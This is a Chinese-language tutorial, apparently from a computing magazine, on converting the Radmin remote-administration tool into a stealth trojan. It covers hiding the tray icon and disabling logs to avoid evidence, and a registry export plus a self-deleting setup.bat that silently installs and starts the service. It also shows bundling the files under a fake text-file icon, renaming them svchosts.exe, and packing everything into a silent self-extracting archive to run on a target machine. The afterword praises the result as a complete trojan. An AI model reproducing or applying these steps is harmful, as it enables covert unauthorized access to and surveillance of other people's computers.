阅读提示： 　　改造Radmin

　　1.先去除Radmin在服务端运行后的任务栏标志。进入Radmin“服务端设置”中的“设置参数”（见图1），在“隐藏状态栏图标”前打上√，这样原本在服务端运行后会在状态栏有图标的弊端就剔除了。

　　2.然后根据自己的需要，更改连接端口号，设置成不常用的1986端口。其它地方可不作修改（值得注意的是“日志”选项，千万不要因为错选“保留记录文件”从而留下“罪证”），点击“确定”退出。

　　3.点选“设置密码”来设置连接时的密码******。

　　4.一切设置妥当后，先在自己机子上安装了服务（因为Radmin工作原理的特殊性，配置信息并非记录在服务端程序内，而是在相关的注册表键值内）。待软件提示成功安装服务后，打开注册表编辑器，找到：HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 键值，点击“导出注册表”并保存成单独的r_server.reg文件，用记事本打开后，发现其中内容如下（根据设置的不同，参数会略有出入）：

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTE
M\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:9c,ee,06,f2,9b,05,13,f8,6e,66,9a,06,00,24,5b,4b(这里是连接密码！其它信息不影响操作，所以不需要掌握)
"Port"=hex:c2,07,00,00(连接服务端时用的端口)
"Timeout"=hex:0a,00,00,00
************************
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00(01表示隐藏系统右下角的图标,如改成00图标就会被显示)
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00

　　5.最后在桌面新建了一个setup.bat批处理文件，在里面添加如下脚本：

@echo off
*********************** （自动安装Radmin服务端）
regedit.exe -s %SystemRoot%\system32\r_server.reg >nul （自动将r_server.reg内的配置信息导入目标机注册表）
net start r_server >nul （启动r_server服务端服务）
*******************************（删除信息文件）
del %0

　　注意：文中代码后括号内的内容为注释，勿输入。

　超级捆绑

　　由于Radmin并不是“木马型”监控软件，所以它的服务端是由r_server.exe、raddrv.dll、AdmDll.dll三个文件组成，而一般的“木马”服务端通常只有一个可执行文件。这是个比较麻烦的硬伤，但这难不倒Cytkk，他熟练地运行了一款名为“超级捆绑”的软件。

　　1.在界面点击右边白色图标，将Radmin服务端的三个文件添加进文件列表，捆绑方式设置成“按文件捆绑方式”，然后点击右边的“高级”按钮进入详细设置，在“常规”选项内（图2），将图标自定义为一个文本文件以增加更好的隐蔽性，文件大小则采用默认。

　　2．随后，将“属性”中的“只读”、“隐藏”和“系统”三项全部选中，这样就使捆绑后的文件更具隐蔽和安全性。

　　3．点击“运行”标签，出现捆绑程序运行设置，将文件分解运行目录设置成 “在捆绑后的文件所在目录中运行”，窗口状态则设为“隐藏窗口”。

　　4．他将“参数”页面内的全部个性化设置选项前面的√取消。点击“确定”退回上级窗口，最后设置好捆绑文件输出路径。为了增强隐蔽性，可以将捆绑后的执行文件更名，将它命名为svchosts.exe。

　　5．点击“合并”就完成了服务端的文件捆绑工作。现在的Radmin已经基本上从一款商业化的远程控制软件变成了一个不折不扣的木马了。
　　善后

　　到此，整个改造工作差不多完成了，马上进行关键的收尾工作，即将编辑好的setup.bat以及最先导出的r_server.reg连同捆绑后的svchosts.exe这三个文件用WinRAR打包成自解压程序。

　　再进行了如下设置：在“高级自释放选项”中的“常规”选项内释放路径一栏填入“%systemroot%\system32，在“释放后运行”里则需要把setup.bat(注意填写文件扩展名)写上，这样在解压后才会自动执行该批处理程序（如图3）。在“模式”选项里，把第一个模式设置成“全部隐藏”，覆盖方式设置成“跳过现有文件”，最后将“自释放模块”设置成DOS.SFX的DOS命令行RAR自释放格式（因为取得系统CMD Shell后默认的Windows图形控制台不能正常工作）。点击“确定”完成收尾工作。Cytkk最后检查了一下RAR自释放包内的注释（右边灰色窗口内），看到自解压脚本如下：

　　Path=%systemroot%\system32
　　**************
　　Silent=1
　　Overwrite=2

　　所有工作已经完成，将制作好的打包程序上传到目标计算机运行，随后在自己机子上打开Radmin的客户端，输入目标机IP→连接→输入密码……

　　编后语：

　　整个改造过程看似简单，其实不然，说到底还是个思路问题。身边的很多事例只需要我们动动脑筋，利用一切可以利用的资源就可以实现化腐朽为神奇。例如本文中的批处理程序+自释放包的结合就完美地解决了添加注册表信息的问题，整个过程均在后台进行，在保证隐蔽性和安全性的前提下，巧妙地利用捆绑工具将原本分散的客户端整合到一起，最后又有机地将它们全部结合。这样，一个原本不具备木马功能的商业远程控制软件服务端，就被改造成了百分百木马。这种改造思路带来的启发是值得思考和学习的。

您对本文章有什么意见或着疑问吗？请到论坛讨论您的关注和建议是我们前行的参考和动力